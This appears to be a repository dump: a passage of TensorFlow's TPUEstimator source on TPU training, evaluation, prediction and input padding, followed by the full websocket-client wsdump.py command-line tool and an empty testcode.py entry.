not None: util_lib.check_positive_integer(max_steps, 'Train max_steps') return [ _TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps) ] def _convert_eval_steps_to_hooks(self, steps): with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx: if ctx.is_running_on_cpu(): return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps) if steps is None: raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.') util_lib.check_positive_integer(steps, 'Eval steps') return [ evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access num_evals=steps), _SetEvalIterationsHook(steps) ] def _call_input_fn(self, input_fn, mode): """Calls the input function. Args: input_fn: The input function. mode: ModeKeys Returns: Either features or (features, labels) where features and labels are: features - `Tensor` or dictionary of string feature name to `Tensor`. labels - `Tensor` or dictionary of `Tensor` with labels. Raises: ValueError: if input_fn takes invalid arguments or does not have `params`. """ input_fn_args = function_utils.fn_args(input_fn) config = self.config # a deep copy. kwargs = {} if 'params' in input_fn_args: kwargs['params'] = self.params # a deep copy. else: raise ValueError('input_fn ({}) does not include params argument, ' 'required by TPUEstimator to pass batch size as ' 'params["batch_size"]'.format(input_fn)) if 'config' in input_fn_args: kwargs['config'] = config if 'mode' in input_fn_args: kwargs['mode'] = mode # Records the fact input_fn has been invoked. self._is_input_fn_invoked = True with self._ctx.with_mode(mode) as ctx: # Setting the batch size in params first. This helps user to have same # input_fn for use_tpu=True/False. batch_size_for_input_fn = ctx.batch_size_for_input_fn if batch_size_for_input_fn is not None: _add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY, batch_size_for_input_fn) # For export_savedmodel, input_fn is never passed to Estimator. So, # `is_export_mode` must be False. if ctx.is_running_on_cpu(is_export_mode=False): with ops.device('/device:CPU:0'): return input_fn(**kwargs) # For TPU computation, input_fn should be invoked in a tf.while_loop for # performance. While constructing the tf.while_loop, the structure of # inputs returned by the `input_fn` needs to be recorded. The structure # includes whether features or labels is dict or single Tensor, dict keys, # tensor shapes, and dtypes. The recorded structure is used to create the # infeed dequeue ops, which must be wrapped and passed as a Fn, called # inside the TPU computation, as the TPU computation is wrapped inside a # tf.while_loop also. So, we either pass input_fn to model_fn or pass # dequeue_fn to model_fn. Here, `input_fn` is passed directly as # `features` in `model_fn` signature. def _input_fn(ctx): _add_item_to_params(kwargs['params'], _CTX_KEY, ctx) return input_fn(**kwargs) return _input_fn def _validate_features_in_predict_input(self, result): """Skip the validation. For TPUEstimator, we do not need to check the result type. `_InputPipeline` has stronger check. Parent class's check generates confusing warning msg. Args: result: `features` returned by input_fn. """ pass def _augment_model_fn(self, model_fn, batch_axis): """Returns a new model_fn, which wraps the TPU support.""" def _model_fn(features, labels, mode, config, params): """A Estimator `model_fn` for TPUEstimator.""" with self._ctx.with_mode(mode) as ctx: model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx) if mode != model_fn_lib.ModeKeys.PREDICT: is_export_mode = False else: # For export_savedmodel, input_fn is never passed to Estimator. So, by # checking the self._is_input_fn_invoked bit, we can know, given the # mode == PREDICT, it is the .predict API, not export_savedmodel API. if self._is_input_fn_invoked: is_export_mode = False else: is_export_mode = True # Clear the bit. self._is_input_fn_invoked = None if ctx.is_running_on_cpu(is_export_mode=is_export_mode): logging.info('Running %s on CPU', mode) return model_fn_wrapper.call_without_tpu( features, labels, is_export_mode=is_export_mode) assert labels is None, '`labels` passed to `model_fn` must be `None`.' # TPUEstimator._call_input_fn passes `input_fn` as features to here. assert callable(features), '`input_fn` is not callable.' input_fn = features input_holders = _InputPipeline(input_fn, batch_axis, ctx) enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = ( input_holders.generate_infeed_enqueue_ops_and_dequeue_fn()) graph = ops.get_default_graph() for enqueue_op in enqueue_ops: if isinstance(enqueue_op, list): graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op) else: graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op) if mode == model_fn_lib.ModeKeys.TRAIN: loss, host_call, scaffold = ( _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn)) host_ops = host_call.create_tpu_hostcall() if host_ops is None: host_ops = [] shutdown_hooks = [] shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE', 'shutdown_worker') if shutdown_mode: if shutdown_mode == 'shutdown_worker': finalizer_hooks = [ session_support.ShutdownLameWorkers(timeout_ms=60*1000), ] elif shutdown_mode == 'shutdown_computation': finalizer_hooks = [ session_support.RestartComputation(timeout_ms=60*1000), ] else: raise ValueError('Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode) shutdown_hooks.append(session_support.GracefulShutdownHook( checkpoint_prefix=self.model_dir + '/model.ckpt', on_shutdown_hooks=finalizer_hooks )) with ops.control_dependencies([loss]): global_step = array_ops.identity(training.get_global_step()) hooks = input_hooks + shutdown_hooks logging_hook_frequency = ( # Divide and round up (self._log_every_n_steps + self._config.tpu_config.iterations_per_loop - 1) // self._config.tpu_config.iterations_per_loop) hooks.extend([ TPUInfeedOutfeedSessionHook( ctx, enqueue_ops, host_ops, run_infeed_loop_on_coordinator=( run_infeed_loop_on_coordinator)), InstallSignalHandlerHook(), training.LoggingTensorHook( { 'loss': array_ops.identity(loss), 'step': global_step, }, every_n_iter=logging_hook_frequency) ]) examples_hook = ExamplesPerSecondHook( ctx.global_batch_size, output_dir=self.model_dir, every_n_steps=self._log_every_n_steps) examples_hook._set_steps_per_run( # pylint: disable=protected-access self._config.tpu_config.iterations_per_loop) hooks.append(examples_hook) chief_hooks = [] if (self._config.save_checkpoints_secs or self._config.save_checkpoints_steps): checkpoint_hook = training.CheckpointSaverHook( self.model_dir, save_secs=self._config.save_checkpoints_secs, save_steps=self._config.save_checkpoints_steps, scaffold=scaffold) checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access self._config.tpu_config.iterations_per_loop) chief_hooks.append(checkpoint_hook) summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss) with ops.control_dependencies([loss]): update_ops = _sync_variables_ops() # Validate the TPU training graph to catch basic errors _validate_tpu_training_graph() train_op = control_flow_ops.group(*update_ops) graph.add_to_collection(_TPU_TRAIN_OP, train_op) return model_fn_lib.EstimatorSpec( mode, loss=loss, training_chief_hooks=chief_hooks, training_hooks=hooks, train_op=train_op, scaffold=scaffold) if mode == model_fn_lib.ModeKeys.EVAL: total_loss, host_calls, scaffold = _eval_on_tpu_system( ctx, model_fn_wrapper, dequeue_fn) iterations_per_loop_var = _create_or_get_iterations_per_loop() mean_loss = math_ops.div(total_loss, math_ops.cast( iterations_per_loop_var, dtype=total_loss.dtype)) # Creates a dummy metric update_op for all metrics. Estimator expects # all metrics in eval_metric_ops have update_op and calls them one by # one. The real metric update_ops are invoked in a separated thread. # So, here give Estimator the dummy op for all metrics. with ops.control_dependencies([mean_loss]): # After TPU evaluation computation is done (the mean_loss tensor), # reads all variables back from TPU and updates the eval step # counter properly internal_ops_to_run = _sync_variables_ops() internal_ops_to_run.append( _increase_eval_step_op(iterations_per_loop_var)) with ops.control_dependencies(internal_ops_to_run): dummy_update_op = control_flow_ops.no_op() host_call_ret = host_calls.create_tpu_hostcall() eval_metric_ops = {} eval_update_ops = [] for k, v in host_call_ret['eval_metrics'].items(): eval_metric_ops[k] = (v[0], dummy_update_op) eval_update_ops.append(v[1]) if 'host_call' not in host_call_ret: host_ops = [] else: host_ops = host_call_ret['host_call'] hooks = [ TPUInfeedOutfeedSessionHook( ctx, enqueue_ops, eval_update_ops + host_ops, run_infeed_loop_on_coordinator=( run_infeed_loop_on_coordinator)), ] + input_hooks return model_fn_lib.EstimatorSpec( mode, loss=mean_loss, evaluation_hooks=hooks, eval_metric_ops=eval_metric_ops, scaffold=scaffold) # Predict assert mode == model_fn_lib.ModeKeys.PREDICT dummy_predict_op, host_calls, scaffold = _predict_on_tpu_system( ctx, model_fn_wrapper, dequeue_fn) with ops.control_dependencies([dummy_predict_op]): internal_ops_to_run = _sync_variables_ops() with ops.control_dependencies(internal_ops_to_run): dummy_predict_op = control_flow_ops.no_op() # In train and evaluation, the main TPU program is passed to monitored # training session to run. Infeed enqueue and outfeed dequeue are # executed in side threads. This is not the configuration for # prediction mode. # # For prediction, the Estimator executes the EstimatorSpec.predictions # directly and yield the element (via generator) to call site. So, the # outfeed based prediction must be passed to MonitoredSession directly. # Other parts of the TPU execution are organized as follows. # # 1. All outfeed based Tensors must be grouped with predictions Tensors # to form a single invocation. This avoid the issue we might trigger # multiple outfeeds incorrectly. To achieve this, `host_call` is # placed in control_dependencies of `stopping_signals`, and # `stopping_signals` is passed into _StoppingPredictHook, which sets # the `stopping_signals` as SessionRunArgs. MonitoredSession merges # all SessionRunArgs with the fetch in session.run together. # # 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue) # are grouped together. They will be launched once and only once in # side threads and they quit naturally according to the SAME stopping # condition. enqueue_ops.append(dummy_predict_op) host_call_ret = host_calls.create_tpu_hostcall() if 'host_call' not in host_call_ret: host_ops = [] else: host_ops = host_call_ret['host_call'] predictions = host_call_ret['predictions'] _verify_cross_hosts_transfer_size( predictions, message=( 'The estimated size for TPUEstimatorSpec.predictions is too ' 'large.')) signals = host_call_ret['signals'] with ops.control_dependencies(host_ops): host_ops = [] # Empty, we do do not need it anymore. scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal( signals) predictions = _PaddingSignals.slice_tensor_or_dict( predictions, signals) hooks = [ _StoppingPredictHook(scalar_stopping_signal), TPUInfeedOutfeedSessionHookForPrediction(ctx, enqueue_ops, host_ops), ] + input_hooks return model_fn_lib.EstimatorSpec( mode, prediction_hooks=hooks, predictions=predictions, scaffold=scaffold) return _model_fn def _is_tpu_tensor(tensor): if not isinstance(tensor, ops.Tensor): return False try: tensor.op.get_attr(tpu._OUTSIDE_COMPILATION_ATTR) # pylint: disable=protected-access except ValueError: return True else: return False def _export_output_to_tensors(export_output): """Get a list of `Tensors` used in `export_output`. Args: export_output: an `ExportOutput` object such as `ClassificationOutput`, `RegressionOutput`, or `PredictOutput`. Returns: a list of tensors used in export_output. Raises: ValueError: if `export_output` is not one of `ClassificationOutput`, `RegressionOutput`, or `PredictOutput`. """ if isinstance(export_output, export_output_lib.ClassificationOutput): return [export_output.scores, export_output.classes] elif isinstance(export_output, export_output_lib.RegressionOutput): return [export_output.value] elif isinstance(export_output, export_output_lib.PredictOutput): return export_output.outputs.values() else: raise ValueError( '`export_output` must be have type `ClassificationOutput`, ' '`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output)) def _clone_export_output_with_tensors(export_output, tensors): """Clones `export_output` but with new `tensors`. Args: export_output: an `ExportOutput` object such as `ClassificationOutput`, `RegressionOutput`, or `PredictOutput`. tensors: a list of `Tensors` used to construct a new `export_output`. Returns: A dict similar to `export_output` but with `tensors`. Raises: ValueError: if `export_output` is not one of `ClassificationOutput`, `RegressionOutput`, or `PredictOutput`. """ if isinstance(export_output, export_output_lib.ClassificationOutput): if len(tensors) != 2: raise ValueError('tensors must be of length 2; ' 'got {}.'.format(len(tensors))) return export_output_lib.ClassificationOutput(*tensors) elif isinstance(export_output, export_output_lib.RegressionOutput): if len(tensors) != 1: raise ValueError('tensors must be of length 1; ' 'got {}'.format(len(tensors))) return export_output_lib.RegressionOutput(*tensors) elif isinstance(export_output, export_output_lib.PredictOutput): return export_output_lib.PredictOutput( dict(zip(export_output.outputs.keys(), tensors))) else: raise ValueError( '`export_output` must be have type `ClassificationOutput`, ' '`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output)) def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn): """Executes `model_fn_wrapper` multiple times on all TPU shards.""" iterations_per_loop_var = _create_or_get_iterations_per_loop() single_tpu_eval_step, host_calls, captured_scaffold_fn = ( model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)) def multi_tpu_eval_steps_on_single_shard(): return training_loop.repeat( iterations_per_loop_var, single_tpu_eval_step, [_ZERO_LOSS]) (loss,) = tpu.shard( multi_tpu_eval_steps_on_single_shard, inputs=[], num_shards=ctx.num_replicas, outputs_from_all_shards=False, device_assignment=ctx.device_assignment) scaffold = _get_scaffold(captured_scaffold_fn) return loss, host_calls, scaffold def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn): """Executes `model_fn_wrapper` multiple times on all TPU shards.""" iterations_per_loop_var = _create_or_get_iterations_per_loop() single_tpu_train_step, host_call, captured_scaffold_fn = ( model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn)) def multi_tpu_train_steps_on_single_shard(): return training_loop.repeat( iterations_per_loop_var, single_tpu_train_step, [_INITIAL_LOSS]) (loss,) = tpu.shard( multi_tpu_train_steps_on_single_shard, inputs=[], num_shards=ctx.num_replicas, outputs_from_all_shards=False, device_assignment=ctx.device_assignment) scaffold = _get_scaffold(captured_scaffold_fn) return loss, host_call, scaffold def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn): """Executes `model_fn_wrapper` multiple times on all TPU shards.""" num_cores = ctx.num_cores single_tpu_predict_step, host_calls, captured_scaffold_fn = ( model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)) def multi_tpu_predict_steps_on_single_shard(): def cond(scalar_stopping_signal): return math_ops.logical_not( _StopSignals.should_stop(scalar_stopping_signal)) inputs = [_StopSignals.NON_STOPPING_SIGNAL] outputs = training_loop.while_loop( cond, single_tpu_predict_step, inputs=inputs, name=b'loop') return outputs (dummy_predict_op,) = tpu.shard( multi_tpu_predict_steps_on_single_shard, inputs=[], num_shards=num_cores, outputs_from_all_shards=False) scaffold = _get_scaffold(captured_scaffold_fn) return dummy_predict_op, host_calls, scaffold def _wrap_computation_in_while_loop(device, op_fn): """Wraps the ops generated by `op_fn` in tf.while_loop.""" def computation(i): with ops.control_dependencies(op_fn()): return i + 1 iterations_per_loop_var = _create_or_get_iterations_per_loop() # By setting parallel_iterations=1, the parallel execution in while_loop is # basically turned off. with ops.device(device): iterations = array_ops.identity(iterations_per_loop_var) return control_flow_ops.while_loop( lambda i: i < iterations, computation, [constant_op.constant(0)], parallel_iterations=1) def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn): """Wraps the ops generated by `op_fn` in tf.while_loop.""" def cond(scalar_stopping_signal): return math_ops.logical_not( _StopSignals.should_stop(scalar_stopping_signal)) def computation(unused_scalar_stopping_signal): return_value = op_fn() execute_ops = return_value['ops'] signals = return_value['signals'] with ops.control_dependencies(execute_ops): return _StopSignals.as_scalar_stopping_signal(signals) # By setting parallel_iterations=1, the parallel execution in while_loop is # basically turned off. with ops.device(device): return control_flow_ops.while_loop( cond, computation, [_StopSignals.NON_STOPPING_SIGNAL], parallel_iterations=1) def _validate_tpu_training_graph(): """Validate graph before running distributed training. Raises: ValueError: If the graph seems invalid for running on device """ operations = ops.get_default_graph().get_operations() # Check if there is atleast one CrossReplicaSum operation in the graph # This should be introduced by using the CrossShardOptimizer wrapper cross_replica_sum_ops = [ o for o in operations if o.type == _CROSS_REPLICA_SUM_OP ] if not cross_replica_sum_ops: raise ValueError( 'CrossShardOptimizer must be used for model training on TPUs.') class _CapturedObject(object): """A placeholder to capture an object. This is useful when we need to capture a Python object in the Tensorflow control flow body function and use it outside the control flow. """ def __init__(self): self._object = None self._captured = False def capture(self, o): if self._captured: raise RuntimeError( 'InternalError: Object can capture only once. Please file bug.') self._captured = True self._object = o def get(self): if not self._captured: raise RuntimeError( 'InternalError: Object is not captured properly before `get`. ' 'Please file bug.') return self._object def _get_scaffold(captured_scaffold_fn): """Retrieves the Scaffold from `captured_scaffold_fn`.""" with _CapturingContext(message='Inside scaffold_fn'): scaffold_fn = captured_scaffold_fn.get() if scaffold_fn: scaffold = scaffold_fn() if scaffold is None: raise ValueError( 'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed') else: scaffold = None if scaffold: wrapped_finalize = scaffold.finalize def _finalize(): with _CapturingContext('Inside Scaffold.finalize'): wrapped_finalize() scaffold.finalize = _finalize return scaffold class _CapturingContext(control_flow_ops.ControlFlowContext): """Tracks references to Tensors defined in TPU replication.""" def __init__(self, message): control_flow_ops.ControlFlowContext.__init__(self) self._message = message def AddOp(self, op): # pylint: disable=invalid-name for c in op.inputs: if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access raise ValueError('{}: Op {} depends on TPU computation {}, ' 'which is not allowed.'.format(self._message, op, c)) def __enter__(self): # pylint: disable=protected-access self._g = ops.get_default_graph() self._old = self._g._get_control_flow_context() self._g._set_control_flow_context(self) # pylint: enable=protected-access def __exit__(self, _, __, ___): # pylint: disable=invalid-name self._g._set_control_flow_context(self._old) # pylint: disable=protected-access class _Inputs(object): """A data structure representing the input_fn returned values. This also supports the returned value from input_fn as `Dataset`. """ def __init__(self, features=None, labels=None, dataset=None, signals=None): if dataset is not None and (features is not None or labels is not None or signals is not None): raise RuntimeError('Internal Error: Either (features and labels) or ' 'dataset should be provided, not both. Please file ' 'bug') self._features = features self._labels = labels self._signals = signals self._dataset = dataset self._iterator = None @staticmethod def from_input_fn(return_values): """Returns an `_Inputs` instance according to `input_fn` return value.""" if isinstance(return_values, dataset_ops.Dataset): dataset = return_values return _Inputs(dataset=dataset) features, labels = _Inputs._parse_inputs(return_values) return _Inputs(features, labels) @staticmethod def _parse_inputs(return_values): if isinstance(return_values, tuple): features, labels = return_values else: features, labels = return_values, None return features, labels @property def is_dataset(self): """Returns True if the return value from input_fn is Dataset.""" return self._dataset is not None def dataset_initializer_hook(self): """Returns a `SessionRunHook` to initialize this dataset. This must be called before `features_and_labels`. """ iterator = self._dataset.make_initializable_iterator() # pylint: disable=protected-access hook = estimator_util._DatasetInitializerHook(iterator) # pylint: enable=protected-access self._iterator = iterator return hook def features_and_labels(self): """Gets `features` and `labels`.""" if self.is_dataset: if self._iterator is None: raise RuntimeError('Internal error: Must call dataset_initializer_hook ' 'before calling features_and_labels(). Please file ' 'a bug!') return _Inputs._parse_inputs(self._iterator.get_next()) return (self._features, self._labels) def signals(self): return self._signals @property def dataset(self): return self._dataset class _InputsWithStoppingSignals(_Inputs): """Inputs with `_StopSignals` inserted into the dataset.""" def __init__(self, dataset, batch_size, add_padding=False): assert dataset is not None user_provided_dataset = dataset.map( _InputsWithStoppingSignals.insert_stopping_signal( stop=False, batch_size=batch_size, add_padding=add_padding)) final_batch_dataset = dataset.take(1).map( _InputsWithStoppingSignals.insert_stopping_signal( stop=True, batch_size=batch_size, add_padding=add_padding)) dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2) super(_InputsWithStoppingSignals, self).__init__(dataset=dataset) self._current_inputs = None def features_and_labels(self): if self._current_inputs is not None: raise RuntimeError( 'Internal Error: The previous inputs have not been properly ' 'consumed. First call features_and_labels, then call signals.') inputs_with_signals = self._iterator.get_next() features = inputs_with_signals['features'] labels = inputs_with_signals.get('labels') self._current_inputs = inputs_with_signals return features, labels def signals(self): """Returns the `Signals` from `_Inputs`.""" if self._current_inputs is None: raise RuntimeError( 'Internal Error: The current inputs have not been properly ' 'generated. First call features_and_labels, then call signals.') signals = self._current_inputs['signals'] self._current_inputs = None return signals @staticmethod def insert_stopping_signal(stop, batch_size, add_padding=False): """Inserts stopping_signal into dataset via _map_fn. Here we change the data structure in the dataset, such that the return value is a dictionary now and `features`, `labels`, and `signals` are three distinguished keys in that dict. This provides a better structure, which eases the process to decompose the inputs (see `features_and_labels`). Args: stop: bool, state of current stopping signals. batch_size: int, batch size. add_padding: bool, whether to pad the tensor to full batch size. Returns: A map_fn passed to dataset.map API. """ def _map_fn(*args): """The map fn to insert signals.""" if len(args) == 1: # Unpack the single Tensor/dict argument as features. This is required # for the input_fn returns no labels. args = args[0] features, labels = _Inputs._parse_inputs(args) new_input_dict = {} if add_padding: padding_mask, features, labels = ( _PaddingSignals.pad_features_and_labels( features, labels, batch_size)) new_input_dict['features'] = features if labels is not None: new_input_dict['labels'] = labels else: new_input_dict['features'] = features if labels is not None: new_input_dict['labels'] = labels padding_mask = None new_input_dict['signals'] = _StopSignals( stop=stop, batch_size=batch_size, padding_mask=padding_mask).as_dict() return new_input_dict return _map_fn class _StopSignals(object): """Signals class holding all logic to handle TPU stopping condition.""" NON_STOPPING_SIGNAL = False STOPPING_SIGNAL = True def __init__(self, stop, batch_size, padding_mask=None): self._stop = stop self._batch_size = batch_size self._padding_mask = padding_mask def as_dict(self): """Returns the signals as Python dict.""" shape = [self._batch_size, 1] dtype = dtypes.bool if self._stop: stopping = array_ops.ones(shape=shape, dtype=dtype) else: stopping = array_ops.zeros(shape=shape, dtype=dtype) signals = {'stopping': stopping} if self._padding_mask is not None: signals['padding_mask'] = self._padding_mask return signals @staticmethod def as_scalar_stopping_signal(signals): return array_ops.identity(signals['stopping'][0][0]) @staticmethod def should_stop(scalar_stopping_signal): """Detects whether scalar_stopping_signal indicates stopping.""" if isinstance(scalar_stopping_signal, ops.Tensor): # STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF # way to express the bool check whether scalar_stopping_signal is True. return math_ops.logical_and( scalar_stopping_signal, _StopSignals.STOPPING_SIGNAL) else: # For non Tensor case, it is used in SessionRunHook. So, we cannot modify # the graph anymore. Here, we use pure Python. return bool(scalar_stopping_signal) class _PaddingSignals(object): """Signals class holding all logic to handle padding.""" @staticmethod def pad_features_and_labels(features, labels, batch_size): """Pads out the batch dimension of features and labels.""" real_batch_size = array_ops.shape( _PaddingSignals._find_any_tensor(features))[0] batch_size_tensor = constant_op.constant(batch_size, dtypes.int32) check_greater = check_ops.assert_greater_equal( batch_size_tensor, real_batch_size, data=(batch_size_tensor, real_batch_size), message='The real batch size should not be greater than batch_size.') with ops.control_dependencies([check_greater]): missing_count = batch_size_tensor - real_batch_size def pad_single_tensor(tensor): """Pads out the batch dimension of a tensor to the complete batch_size.""" rank = len(tensor.shape) assert rank > 0 padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1)) padded_shape = (batch_size,) + tuple(tensor.shape[1:]) padded_tensor = array_ops.pad(tensor, padding) padded_tensor.set_shape(padded_shape) return padded_tensor def nest_pad(tensor_or_dict): return nest.map_structure(pad_single_tensor, tensor_or_dict) features = nest_pad(features) if labels is not None: labels = nest_pad(labels) padding_mask = _PaddingSignals._padding_mask( real_batch_size, missing_count, batch_size) return padding_mask, features, labels @staticmethod def slice_tensor_or_dict(tensor_or_dict, signals): """Slice the real Tensors according to padding mask in signals.""" padding_mask = signals['padding_mask'] batch_size = array_ops.shape(padding_mask)[0] def verify_batch_size(tensor): check_batch_size = math_ops.equal(batch_size, tensor.shape[0]) with ops.control_dependencies([check_batch_size]): return array_ops.identity(tensor) def slice_single_tensor(tensor): rank = len(tensor.shape) assert rank > 0 real_batch_size = batch_size - math_ops.reduce_sum(padding_mask) return verify_batch_size(tensor)[0:real_batch_size] # As we split the Tensors to all TPU cores and concat them back, it is # important to ensure the real data is placed before padded ones, i.e., # order is preserved. By that, the sliced padding mask should have all 0's. # If this assertion failed, # the slice logic here would not hold. sliced_padding_mask = slice_single_tensor(padding_mask) assert_padding_mask = math_ops.equal( math_ops.reduce_sum(sliced_padding_mask), 0) with ops.control_dependencies([assert_padding_mask]): should_stop = _StopSignals.should_stop( _StopSignals.as_scalar_stopping_signal(signals)) is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0) def slice_fn(tensor): # If the current batch is full batch or part of stopping signals, we do # not need to slice to save performance. return control_flow_ops.cond( math_ops.logical_or(should_stop, is_full_batch), (lambda: verify_batch_size(tensor)), (lambda: slice_single_tensor(tensor))) return nest.map_structure(slice_fn, tensor_or_dict) @staticmethod def _find_any_tensor(batch_features): tensors = [x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)] if not tensors: raise ValueError('Cannot find any Tensor in features dict.') return tensors[0] @staticmethod def _padding_mask(real_batch_size, missing_count, batch_size): padding_mask = array_ops.concat( [ array_ops.zeros((real_batch_size,), dtype=dtypes.int32), array_ops.ones((missing_count,), dtype=dtypes.int32) ], axis=0) padding_mask.set_shape((batch_size,)) return padding_mask class _SignalsHelper(object): """A general helper class to handle common signals manipulation.""" def __init__(self, signals): self._signal_keys = [] for key in sorted(iter(signals.keys())): self._signal_keys.append(key) @property def num_signals(self): return len(self._signal_keys) def unflatten(self, tensor_list): return dict(zip(self._signal_keys, tensor_list)) @staticmethod def as_tensor_list(signals): return [signals[key] for key in sorted(iter(signals.keys()))] def _verify_cross_hosts_transfer_size(tensor_dict, message): total_size = 0 tensor_structure = {} for key, tensor in tensor_dict.items(): shape = tensor.shape size = np.product(shape) * tensor.dtype.size tensor_structure[key] = shape total_size += size if total_size >= _ONE_GIGABYTE: raise ValueError( '{} The transfer size is larger than the protobuf limit. Please ' 'consider to use Tensors with smaller shapes or reduce batch ' 'size. Given:\n' '{}'.format(message, '\n'.join([ ' -- Key: {}, Shape: {}'.format(k, v) for k, v in tensor_structure.items()]))) def _add_item_to_params(params, key, value): """Adds a new item into `params`.""" if isinstance(params, hparam.HParams): # For HParams, we need to use special API. if key in params: params.set_hparam(key, value) else: params.add_hparam(key, value) else: # Now params is Python dict. params[key] = value
wsdump.py
#!d:\github\reddit-stonk-scrape\rsc\scripts\python.exe import argparse import code import sys import threading import time import ssl import gzip import zlib import six from six.moves.urllib.parse import urlparse import websocket try: import readline except ImportError: pass def get_encoding(): encoding = getattr(sys.stdin, "encoding", "") if not encoding: return "utf-8" else: return encoding.lower() OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY) ENCODING = get_encoding() class VAction(argparse.Action): def __call__(self, parser, args, values, option_string=None): if values is None: values = "1" try: values = int(values) except ValueError: values = values.count("v") + 1 setattr(args, self.dest, values) def parse_args(): parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool") parser.add_argument("url", metavar="ws_url", help="websocket url. ex. ws://echo.websocket.org/") parser.add_argument("-p", "--proxy", help="proxy url. ex. http://127.0.0.1:8080") parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction, dest="verbose", help="set verbose mode. If set to 1, show opcode. " "If set to 2, enable to trace websocket module") parser.add_argument("-n", "--nocert", action='store_true', help="Ignore invalid SSL cert") parser.add_argument("-r", "--raw", action="store_true", help="raw output") parser.add_argument("-s", "--subprotocols", nargs='*', help="Set subprotocols") parser.add_argument("-o", "--origin", help="Set origin") parser.add_argument("--eof-wait", default=0, type=int, help="wait time(second) after 'EOF' received.") parser.add_argument("-t", "--text", help="Send initial text") parser.add_argument("--timings", action="store_true", help="Print timings in seconds") parser.add_argument("--headers", help="Set custom headers. Use ',' as separator") return parser.parse_args() class RawInput: def raw_input(self, prompt): if six.PY3: line = input(prompt) else: line = raw_input(prompt) if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type): line = line.decode(ENCODING).encode("utf-8") elif isinstance(line, six.text_type): line = line.encode("utf-8") return line class InteractiveConsole(RawInput, code.InteractiveConsole): def write(self, data): sys.stdout.write("\033[2K\033[E") # sys.stdout.write("\n") sys.stdout.write("\033[34m< " + data + "\033[39m") sys.stdout.write("\n> ") sys.stdout.flush() def read(self): return self.raw_input("> ") class NonInteractive(RawInput): def write(self, data): sys.stdout.write(data) sys.stdout.write("\n") sys.stdout.flush() def read(self): return self.raw_input("") def main(): start_time = time.time() args = parse_args() if args.verbose > 1: websocket.enableTrace(True) options = {} if args.proxy: p = urlparse(args.proxy) options["http_proxy_host"] = p.hostname options["http_proxy_port"] = p.port if args.origin: options["origin"] = args.origin if args.subprotocols: options["subprotocols"] = args.subprotocols opts = {} if args.nocert: opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False} if args.headers: options['header'] = list(map(str.strip, args.headers.split(','))) ws = websocket.create_connection(args.url, sslopt=opts, **options) if args.raw: console = NonInteractive() else: console = InteractiveConsole() print("Press Ctrl+C to quit") def recv(): try: frame = ws.recv_frame() except websocket.WebSocketException: return websocket.ABNF.OPCODE_CLOSE, None if not frame: raise websocket.WebSocketException("Not a valid frame %s" % frame) elif frame.opcode in OPCODE_DATA: return frame.opcode, frame.data elif frame.opcode == websocket.ABNF.OPCODE_CLOSE: ws.send_close() return frame.opcode, None elif frame.opcode == websocket.ABNF.OPCODE_PING: ws.pong(frame.data) return frame.opcode, frame.data return frame.opcode, frame.data def recv_ws(): while True: opcode, data = recv() msg = None if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes): data = str(data, "utf-8") if isinstance(data, bytes) and len(data)>2 and data[:2] == b'\037\213': # gzip magick try: data = "[gzip] " + str(gzip.decompress(data), "utf-8") except: pass elif isinstance(data, bytes): try: data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8") except: pass if isinstance(data, bytes): data = repr(data) if args.verbose: msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data) else: msg = data if msg is not None: if args.timings: console.write(str(time.time() - start_time) + ": " + msg) else: console.write(msg) if opcode == websocket.ABNF.OPCODE_CLOSE: break thread = threading.Thread(target=recv_ws) thread.daemon = True thread.start() if args.text: ws.send(args.text) while True: try: message = console.read() ws.send(message) except KeyboardInterrupt: return except EOFError: time.sleep(args.eof_wait) return if __name__ == "__main__": try: main() except Exception as e: print(e)
testcode.py
